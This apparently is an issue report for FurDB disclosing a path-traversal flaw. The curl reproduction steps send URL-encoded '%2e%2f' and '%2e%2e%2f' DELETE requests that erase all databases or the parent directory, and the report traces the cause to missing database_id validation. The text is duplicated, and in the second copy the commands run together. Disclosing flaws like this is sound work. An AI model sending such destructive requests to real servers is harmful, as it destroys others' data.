Describe the bug
It is possible to make FurDB delete the database directory or its parent using REST API and Unicode substitution in the URL.
To Reproduce
Start furdb
Create db1 using REST API curl -s -X POST localhost:5678/db1
Create db2 using REST API curl -s -X POST localhost:5678/db2
Make REST delete db request curl -s -X DELETE localhost:5678/%2e%2f
Response {"result":"error","statusCode":500,"status":"Internal Server Error","response":null}
All databases have been deleted.
The request DELETE localhost:5678/%2e%2e%2f will result in the deletion of the parent directory.
Expected behavior
Unicode attack rejected.
Current behavior
Unicode substitution %2e -> . and %2f -> / makes it possible to delete the current directory (using .) or the parent directory (using ..).
Describe the bug It is possible to make FurDB delete the database directory or its parent using REST API and Unicode substitution in the URL.
To Reproduce
curl -s -X POST localhost:5678/db1curl -s -X POST localhost:5678/db2curl -s -X DELETE localhost:5678/%2e%2f{"result":"error","statusCode":500,"status":"Internal Server Error","response":null}The request
DELETE localhost:5678/%2e%2e%2fwill result in the deletion of the parent directory.Expected behavior Unicode attack rejected.
Current behavior Unicode substitution
%2e -> .and%2f -> /makes it possible to delete the current directory (using.) or the parent directory (using..).Reason
database_idvalidation.